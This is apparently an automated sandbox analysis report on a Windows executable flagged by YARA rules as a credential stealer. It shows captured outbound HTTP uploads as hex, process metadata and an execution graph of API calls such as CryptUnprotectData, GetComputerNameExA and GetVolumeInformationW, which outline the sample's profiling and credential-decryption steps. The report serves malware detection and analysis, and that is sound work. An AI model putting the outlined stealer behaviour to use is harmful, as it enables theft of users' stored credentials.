                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: d3 26 75 bf b0 a3 e9 c4 94 1f aa 54 5e 62 f3 5b 0c 12 13 16 13 a1 80 3d 8d 55 53 8e f6 1d 77 85 a0 33 b8 ba 5e 1d 72 66 22 df 12 1d 25 c2 db 2b 52 50 e2 5a 0e a0 f5 e0 a3 1e 59 01 3c 2d 76 ce e1 8e 36 de 09 20 88 94 05 36 2e 6b ee 5d 92 79 86 e2 21 b5 fe fc 0f 2a fb 56 f0 12 68 c9 39 09 d0 1f 45 9c eb f1 2c 36 f3 1a ab b5 68 bc e7 51 24 40 b6 a4 c7 da 98 c8 99 f7 fe 5b 29 87 1f c4 97 ff 96 fa 28 31 57 d2 61 55 eb 22 22 77 c5 df 01 ca 4a 44 9f 48 90 ce 3d cf 08 63 a5 34 84 77 fd b2 89 cb 4c e4 6e ef fd ca 2e 8a a5 69 35 b9 4a a3 3b d9 ba 13 58 5b 71 70 80 13 34 c7 6d 53 e3 b5 c8 5f ab bd fb f6 dd 03 83 d3 07 64 e5 77 ec 2d e9 a5 12 40 0a e3 b0 7a 5c 6d 97 d4 90 77 4f d9 f0 80 a4 40 02 4c 4e 7b 08 91 22 22 d2 96 e3 6e 32 3b 52 42 c9 69 cb b2 11 35 8e 4d 0a
                                                                                                                                                                                                                                                              Data Ascii: &uT^b[=USw3^rf"%+RPZY<-v6 6.k]y!*Vh9E,6hQ$@[)(1WaU""wJDH=c4wLn.i5J;X[qp4mS_dw-@z\mwO@LN{""n2;RBi5M
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 4e af ed 73 40 cc 2c e9 ff 00 8c 87 ca eb d7 9e 4b d5 39 9d 6b 87 d9 b9 0c 82 0f b9 0c b5 89 78 3d 50 35 f2 71 6c e4 0d c2 0f 15 04 29 4f 3e 43 43 47 1b f1 ed 9c 10 08 ea 5a c5 e2 e2 cf 20 6e 2a 94 d1 6f 27 b0 59 65 bc d7 c4 03 6e ae 7f 6a 95 e7 da 17 9f 64 1f 93 42 3c bd a8 de 4b da e7 df 27 fc b2 44 07 08 94 ee ac c4 dc 2f 05 6a 3b 4c ae b3 32 3d ab 2b 97 d3 b8 67 da ce 03 fb 45 de d3 43 78 8f b8 12 de 06 cd 7b f1 d5 0e 22 b5 90 27 79 f5 cb 02 60 7e b3 5a 8f 55 ae 07 93 8d b8 80 45 62 98 6b a3 3f cb e9 66 93 18 aa 1a 35 31 61 ce 1a 60 f3 cc 98 33 39 11 76 ca 6a 5a 8d 48 e3 62 7f 29 9c 77 c3 75 ef e6 eb e8 88 fc 7b d8 14 2c 1f 17 24 9a 46 eb c9 44 a2 48 e8 1d 9c 6e e4 63 d8 5c 25 e0 dc b9 a8 10 8d 05 31 88 e7 3b 3c 42 0d 9e 38 fa 29 90 a9 5e 78 58 36 ab
                                                                                                                                                                                                                                                              Data Ascii: Ns@,K9kx=P5ql)O>CCGZ n*o'YenjdB<K'D/j;L2=+gECx{"'y`~ZUEbk?f51a`39vjZHb)wu{,$FDHnc\%1;<B8)^xX6
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 12 a7 2e c1 04 50 32 56 ae d5 83 ff 59 ac 39 04 29 b7 96 3f 64 0c f2 66 6b 13 cf f3 04 c9 c2 04 d4 fd a1 76 63 03 ba 50 19 0a d9 ad e0 fc 06 1f 37 59 14 87 18 be 44 09 a6 93 21 d8 8d 22 92 ec 35 18 5a d8 ac fb 91 ba fd f9 6d 0c e2 b2 f6 25 48 12 7c 91 cf db a2 4a 9c e0 95 c8 35 44 59 60 90 6c 37 39 96 48 9e e0 6f dc 2b c1 3a 38 19 a7 71 be b6 9f 58 20 c2 20 fa d4 47 3f bc 48 b2 52 47 e8 bb ff f9 9b 74 43 d4 e3 1b 6f ff f7 af fb 05 93 35 a5 d0 ec 9e 00 ed ee 8f f4 5f 83 16 4a aa 65 7d c8 b8 09 80 08 42 b4 ad 14 40 b6 8e 91 e6 41 1c c1 9c 39 74 4d 7c a6 61 d9 21 5e 57 37 53 ac 37 26 dc 9f 7b 59 22 1e 26 cf 69 1d 8c 7a 86 8e 01 29 25 ae 89 d0 57 6e ae 1e aa fe 61 2b 3f 1f 0e 3f 25 41 89 07 76 e7 68 a7 13 80 8d 67 dc a4 df f9 61 55 37 75 0b 52 8b a5 bf 4c 96
                                                                                                                                                                                                                                                              Data Ascii: .P2VY9)?dfkvcP7YD!"5Zm%H|J5DY`l79Ho+:8qX G?HRGtCo5_Je}B@A9tM|a!^W7S7&{Y"&iz)%Wna+??%AvhgaU7uRL
                                                                                                                                                                                                                                                              2024-12-28 08:29:59 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:59 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=dqgovjuop9hl9vdqdvvi47hji9; expires=Wed, 23 Apr 2025 02:16:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZTgf%2BIu014lR3Txui5HHQRfFvXduwKHtdkcdOlOfxByZ9N6JskoOXcpvggajB%2FEDfnYGHUJ2KpjUCWtOFZsM5eY2MjCfJr4euYzPqHNBA0M5G6x4GK5ND9m6RWJJGLkO09s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f82dfbcc325-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1578&rtt_var=606&sent=302&recv=592&lost=0&retrans=0&sent_bytes=2835&recv_bytes=570883&delivery_rate=1783750&cwnd=252&unsent_bytes=0&cid=03d7410ae4f46154&ts=2335&x=0"


                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:03:29:34
                                                                                                                                                                                                                                                              Start date:28/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\hx0wBsOjkQ.exe"
                                                                                                                                                                                                                                                              Imagebase:0x3e0000
                                                                                                                                                                                                                                                              File size:1'810'944 bytes
                                                                                                                                                                                                                                                              MD5 hash:E58E6E26D4FF748BD8E7F718372F8351
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1624031849.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1599366163.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1626918311.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1599230927.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:7.6%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:71.6%
                                                                                                                                                                                                                                                                Total number of Nodes:264
                                                                                                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                                                                                                execution_graph 7176 401d00 7177 421320 LdrInitializeThunk 7176->7177 7180 401d43 7177->7180 7178 4023f5 7180->7178 7187 401de9 7180->7187 7189 41e110 LdrInitializeThunk 7180->7189 7181 41c570 RtlFreeHeap 7182 40239e 7181->7182 7182->7178 7195 41e110 LdrInitializeThunk 7182->7195 7184 402383 7184->7181 7185 40245a 7184->7185 7187->7184 7190 41e110 LdrInitializeThunk 7187->7190 7191 41c570 7187->7191 7189->7180 7190->7187 7192 41c583 7191->7192 7193 41c585 7191->7193 7192->7187 7194 41c58a RtlFreeHeap 7193->7194 7194->7187 7195->7182 7196 3f747d 7207 3f7252 7196->7207 7197 41c570 RtlFreeHeap 7197->7207 7199 3f7cf0 7199->7199 7200 3f7c29 7202 3f7c57 RtlExpandEnvironmentStrings 7200->7202 7201 3f7c81 7203 3f7c91 RtlExpandEnvironmentStrings 7201->7203 7204 4214b0 LdrInitializeThunk 7202->7204 7205 4214b0 LdrInitializeThunk 7203->7205 7204->7201 7205->7201 7206 41e110 LdrInitializeThunk 7206->7207 7207->7196 7207->7197 7207->7199 7207->7200 7207->7201 7207->7206 7208 3f7cd4 7207->7208 7209 3f7b81 RtlExpandEnvironmentStrings 7207->7209 7211 41c5a0 7207->7211 7208->7199 7208->7208 7210 3f80e9 RtlExpandEnvironmentStrings 7208->7210 7209->7207 7210->7208 7212 41c5d0 7211->7212 7215 41c62e 7212->7215 7219 41e110 LdrInitializeThunk 7212->7219 7213 41c801 7213->7207 7215->7213 7218 41c749 7215->7218 7220 41e110 LdrInitializeThunk 7215->7220 7216 41c570 RtlFreeHeap 7216->7213 7218->7216 7219->7215 7220->7218 7221 3ecc7a 7222 3ecc86 7221->7222 7239 4042d0 7222->7239 7224 3ecca8 7249 404560 7224->7249 7226 3eccc4 7259 407440 7226->7259 7228 3ecce6 7267 4090d0 7228->7267 7230 3ecd14 7231 4042d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 7230->7231 7232 3ecd6e 7231->7232 7233 404560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 7232->7233 7234 3ecd8a 7233->7234 7235 407440 RtlFreeHeap LdrInitializeThunk 7234->7235 7236 3ecdac 7235->7236 7237 4090d0 RtlExpandEnvironmentStrings 7236->7237 7238 3ecdda 7237->7238 7240 404360 7239->7240 7240->7240 7241 404376 RtlExpandEnvironmentStrings 7240->7241 7242 4043d0 7241->7242 7243 4046e1 7242->7243 7244 404431 RtlExpandEnvironmentStrings 7242->7244 7248 404450 7242->7248 7271 420460 7243->7271 7244->7242 7244->7243 7244->7248 7248->7224 7248->7248 7250 40456e 7249->7250 7251 420340 LdrInitializeThunk 7250->7251 7252 404408 7251->7252 7253 4046e1 7252->7253 7255 404431 RtlExpandEnvironmentStrings 7252->7255 7258 404450 7252->7258 7254 420460 2 API calls 7253->7254 7256 404712 7254->7256 7255->7252 7255->7253 7255->7258 7257 420340 LdrInitializeThunk 7256->7257 7256->7258 7257->7258 7258->7226 7258->7258 7260 407460 7259->7260 7263 4074ae 7260->7263 7286 41e110 LdrInitializeThunk 7260->7286 7261 407726 7261->7228 7263->7261 7266 40756e 7263->7266 7287 41e110 LdrInitializeThunk 7263->7287 7264 41c570 RtlFreeHeap 7264->7261 7266->7264 7268 409110 7267->7268 7268->7268 7269 409136 RtlExpandEnvironmentStrings 7268->7269 7270 409180 7269->7270 7270->7270 7272 420480 7271->7272 7274 4204ce 7272->7274 7283 41e110 LdrInitializeThunk 7272->7283 7274->7274 7276 404712 7274->7276 7278 4205af 7274->7278 7284 41e110 LdrInitializeThunk 7274->7284 7275 41c570 RtlFreeHeap 7275->7276 7276->7248 7279 420340 7276->7279 7278->7275 7280 420360 7279->7280 7281 42042f 7280->7281 7285 41e110 LdrInitializeThunk 7280->7285 7281->7248 7283->7274 7284->7278 7285->7281 7286->7263 7287->7266 7043 3e9eb7 7044 41fe00 7043->7044 7045 3e9ec7 WSAStartup 7044->7045 7288 41eb88 7289 41eba0 7288->7289 7292 41ebde 7289->7292 7295 41e110 LdrInitializeThunk 7289->7295 7290 41ec4e 7292->7290 7294 41e110 LdrInitializeThunk 7292->7294 7294->7290 7295->7292 7296 3eec77 7297 3eec8e CoInitializeSecurity 7296->7297 7046 40d34a 7047 40d370 7046->7047 7047->7047 7048 40d3ea GetPhysicallyInstalledSystemMemory 7047->7048 7049 40d410 7048->7049 7049->7049 7298 41e40d 7299 41e484 7298->7299 7300 41ed6e 7299->7300 7302 41e110 LdrInitializeThunk 7299->7302 7302->7300 7050 3f1d2b 7052 3f1d45 7050->7052 7051 3ef444 7052->7051 7053 3f1e89 RtlExpandEnvironmentStrings 7052->7053 7053->7051 7303 3ea369 7304 3ea430 7303->7304 7304->7304 7307 3eb100 7304->7307 7306 3ea479 7309 3eb190 7307->7309 7309->7309 7310 3eb1b5 7309->7310 7311 41e0a0 7309->7311 7310->7306 7312 41e0c0 7311->7312 7313 41e0f3 7311->7313 7315 41e0d4 7311->7315 7316 41e0e8 7311->7316 7312->7313 7312->7315 7314 41c570 RtlFreeHeap 7313->7314 7314->7316 7317 41e0d9 RtlReAllocateHeap 7315->7317 7316->7309 7317->7316 7054 3f1227 7055 3f1241 7054->7055 7056 3f14e5 RtlExpandEnvironmentStrings 7055->7056 7057 3ef444 7055->7057 7058 3f1562 7056->7058 7058->7057 7060 3f57c0 7058->7060 7061 3f57e0 7060->7061 7061->7061 7086 421320 7061->7086 7063 3f58ed 7066 3f5ae8 7063->7066 7069 3f5b92 7063->7069 7075 3f594e 7063->7075 7082 3f5cad 7063->7082 7094 421720 7063->7094 7066->7075 7101 41e110 LdrInitializeThunk 7066->7101 7068 421720 LdrInitializeThunk 7068->7082 7069->7069 7070 421320 LdrInitializeThunk 7069->7070 7070->7082 7073 3f6f0e 7074 3f60b5 CryptUnprotectData 7076 3f60df 7074->7076 7074->7082 7075->7057 7076->7057 7079 3f66be 7076->7079 7084 3f634d 7076->7084 7077 3f68eb 7077->7073 7077->7077 7104 41e110 LdrInitializeThunk 7077->7104 7083 3f6792 7079->7083 7102 41e110 LdrInitializeThunk 7079->7102 7080 3f731b 7082->7068 7082->7074 7082->7075 7082->7076 7100 41e110 LdrInitializeThunk 7082->7100 7083->7077 7103 41e110 LdrInitializeThunk 7083->7103 7084->7075 7090 4214b0 7084->7090 7087 421340 7086->7087 7088 42145e 7087->7088 7105 41e110 LdrInitializeThunk 7087->7105 7088->7063 7091 4214d0 7090->7091 7091->7091 7092 4215fe 7091->7092 7106 41e110 LdrInitializeThunk 7091->7106 7092->7084 7095 421750 7094->7095 7098 4217a9 7095->7098 7107 41e110 LdrInitializeThunk 7095->7107 7096 3f593f 7096->7066 7096->7069 7096->7075 7096->7082 7098->7096 7108 41e110 LdrInitializeThunk 7098->7108 7100->7082 7101->7079 7102->7083 7103->7077 7104->7080 7105->7088 7106->7092 7107->7098 7108->7096 7113 41c55c RtlAllocateHeap 7318 41679f 7319 4167bc 7318->7319 7321 41682d 7319->7321 7322 41e110 LdrInitializeThunk 7319->7322 7322->7319 7114 3e9d1e 7115 3e9d40 7114->7115 7115->7115 7116 3e9d94 LoadLibraryExW 7115->7116 7117 3e9da5 7116->7117 7117->7117 7118 3e9e74 LoadLibraryExW 7117->7118 7119 3e9e85 7118->7119 7323 418ea0 7324 418ec5 7323->7324 7325 418fc9 7324->7325 7332 41e110 LdrInitializeThunk 7324->7332 7328 419210 7325->7328 7329 4190e1 7325->7329 7331 41e110 LdrInitializeThunk 7325->7331 7329->7328 7333 41e110 LdrInitializeThunk 7329->7333 7331->7325 7332->7324 7333->7329 7334 41a2a0 7338 41a2d0 7334->7338 7335 420340 LdrInitializeThunk 7335->7338 7336 41a428 7338->7335 7338->7336 7340 420d20 7338->7340 7348 41e110 LdrInitializeThunk 7338->7348 7341 420d2f 7340->7341 7344 420e98 7341->7344 7349 41e110 LdrInitializeThunk 7341->7349 7342 42114b 7342->7338 7344->7342 7347 42108e 7344->7347 7350 41e110 LdrInitializeThunk 7344->7350 7345 41c570 RtlFreeHeap 7345->7342 7347->7345 7348->7338 7349->7344 7350->7347 7125 4393e5 7126 439ad9 VirtualAlloc 7125->7126 7127 439ef1 7126->7127 7128 41e967 7129 41e980 7128->7129 7132 41e110 LdrInitializeThunk 7129->7132 7131 41e9ef 7132->7131 7351 41ea29 7352 41ea50 7351->7352 7354 41ea8e 7352->7354 7358 41e110 LdrInitializeThunk 7352->7358 7357 41e110 LdrInitializeThunk 7354->7357 7356 41eb59 7357->7356 7358->7354 7359 410b2b CoSetProxyBlanket 7360 3eef53 7361 3eef5d CoInitializeEx 7360->7361 7134 40d7ee 7135 40d7f5 7134->7135 7135->7135 7136 40d896 FreeLibrary 7135->7136 7137 40dbc9 7136->7137 7137->7137 7138 40dc30 GetComputerNameExA 7137->7138 7139 4018f0 7140 4018fe 7139->7140 7142 401950 7139->7142 7143 401a10 7140->7143 7144 401a20 7143->7144 7144->7144 7145 4214b0 LdrInitializeThunk 7144->7145 7146 401b0f 7145->7146 7362 40c8b1 7363 40c8b0 7362->7363 7363->7362 7365 40c8be 7363->7365 7368 41e110 LdrInitializeThunk 7363->7368 7367 41e110 LdrInitializeThunk 7365->7367 7367->7365 7368->7365 7147 3ee687 7148 3ee6a0 7147->7148 7153 419280 7148->7153 7150 3ee77a 7151 419280 5 API calls 7150->7151 7152 3ee908 7151->7152 7152->7152 7154 4192b0 7153->7154 7155 41954f SysAllocString 7154->7155 7159 4198eb 7154->7159 7157 419574 7155->7157 7156 419916 GetVolumeInformationW 7160 419934 7156->7160 7158 41957c CoSetProxyBlanket 7157->7158 7157->7159 7158->7159 7161 41959c 7158->7161 7159->7156 7160->7150 7162 4198d6 SysFreeString SysFreeString 7161->7162 7162->7159 7163 40d17d 7164 40d190 7163->7164 7165 40d1ab EnumDisplaySettingsW 7164->7165 7166 40d1ca 7165->7166 7166->7166 7167 40d2a0 FreeLibrary 7166->7167 7168 40d2aa 7167->7168 7369 40d7bd 7370 40d7ca GetComputerNameExA 7369->7370 7169 3e8600 7172 3e860f 7169->7172 7170 3e8a48 ExitProcess 7172->7170 7173 41e080 7172->7173 7174 41f970 7173->7174 7175 41e085 FreeLibrary 7174->7175 7175->7170

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 003F57C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                                                • API String ID: 0-510280711
                                                                                                                                                                                                                                                                • Opcode ID: 8f9fcf459ffd2656526da12d4d619a9dfdb46712d58549fdbe0951dc62194777
                                                                                                                                                                                                                                                                • Instruction ID: 56dc7169d005fbf208a8cef28bd1a549cf892dec2d51ceedafc84c6079c5746c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9fcf459ffd2656526da12d4d619a9dfdb46712d58549fdbe0951dc62194777
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21C226B1608350CFD7258F28D8927ABB7E6FF95314F59893CE5C98B292D7349806CB42
                                                                                                                                                                                                                                                                Function 00401D00 Relevance: 26.8, Strings: 21, Instructions: 506COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 369 401d00-401d48 call 421320 372 402449-402459 369->372 373 401d4e-401db8 call 3f4c70 call 41c540 369->373 378 401dba-401dbd 373->378 379 401dd6-401dda 378->379 380 401dbf-401dd4 378->380 381 401ddc-401de7 379->381 380->378 382 401de9 381->382 383 401dee-401e05 381->383 384 401ea8-401eab 382->384 385 401e07-401e95 383->385 386 401e0c-401e17 383->386 390 401ead 384->390 391 401eaf-401eb4 384->391 388 401e97-401e9c 385->388 386->388 389 401e19-401e89 call 41e110 386->389 393 401ea0-401ea3 388->393 394 401e9e 388->394 397 401e8e-401e93 389->397 390->391 395 402392-4023c7 call 41c570 391->395 396 401eba-401eca 391->396 393->381 394->384 403 4023c9-4023cc 395->403 398 401ecc-401ee9 396->398 397->388 401 40207b-402083 398->401 402 401eef-401f13 398->402 404 402085-402088 401->404 405 401f17-401f1a 402->405 406 4023e5-4023eb 403->406 407 4023ce-4023e3 403->407 408 402090-4020a1 call 41c540 404->408 409 40208a-40208e 404->409 410 401f33-401f4d call 402460 405->410 411 401f1c-401f31 405->411 413 4023ed-4023f3 406->413 407->403 428 4020b1-4020b3 408->428 429 4020a3-4020ac 408->429 414 4020b5-4020b7 409->414 410->401 422 401f53-401f7c 410->422 411->405 417 4023f5 413->417 418 4023f7-402409 413->418 420 402358-402363 414->420 421 4020bd-4020e0 414->421 425 402447 417->425 426 40240b 418->426 427 40240d-402413 418->427 423 402365-402375 420->423 424 402367-40236f 420->424 430 4020e2-4020e5 421->430 433 401f7e-401f81 422->433 435 402377 423->435 424->435 425->372 436 40243b-40243e 426->436 427->436 437 402415-402437 call 41e110 427->437 428->414 438 402379-40237d 429->438 431 4020e7-402118 430->431 432 40211a-402157 430->432 431->430 439 40215b-40215e 432->439 440 401f83-401fac 433->440 441 401fae-401fc5 call 402460 433->441 435->438 444 402440 436->444 445 402442-402445 436->445 437->436 438->398 443 402383-402388 438->443 446 402160-402175 439->446 447 402177-40217f 439->447 440->433 457 401fd4-401feb 441->457 458 401fc7-401fcf 441->458 453 40245a 443->453 454 40238e-402390 443->454 444->425 445->413 446->439 451 402181-40218c 447->451 455 402193-4021aa 451->455 456 40218e 451->456 454->395 461 4021b1-4021be 455->461 462 4021ac-402246 455->462 460 402259-402260 456->460 463 401fed 457->463 464 401fef-402079 call 3e7f50 call 3f48c0 call 3e7f60 457->464 458->404 465 402262 460->465 466 402266-402289 460->466 468 4021c4-40223a call 41e110 461->468 469 402248-40224d 461->469 462->469 463->464 464->404 465->466 471 40228b-40228e 466->471 478 40223f-402244 468->478 474 402251-402254 469->474 475 40224f 469->475 476 402290-4022eb 471->476 477 4022ed-402301 471->477 474->451 475->460 476->471 481 402333-402336 477->481 482 402303-402307 477->482 478->469 484 402347-402349 481->484 485 402338-402345 call 41c570 481->485 483 402309-402310 482->483 488 402320-402323 483->488 489 402312-40231e 483->489 487 40234b-40234e 484->487 485->487 487->420 493 402350-402356 487->493 494 402325 488->494 495 40232b-402331 488->495 489->483 493->438 494->495 495->481
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                                                • API String ID: 0-1565257739
                                                                                                                                                                                                                                                                • Opcode ID: 8f1af34a32bdde97f1636fe5a03d8a3a4359b925c81fef81caeb955bbf5badea
                                                                                                                                                                                                                                                                • Instruction ID: f0e97086cb8101f3b482ec4fdba3ed5e1848b14be1a0975d93c8a2bddb12b9c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f1af34a32bdde97f1636fe5a03d8a3a4359b925c81fef81caeb955bbf5badea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD22BE7050C7808FD3248B28C58436FBBE1AB86314F18496EE9D9973D2D3BD8846CB4B
                                                                                                                                                                                                                                                                Function 00419280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
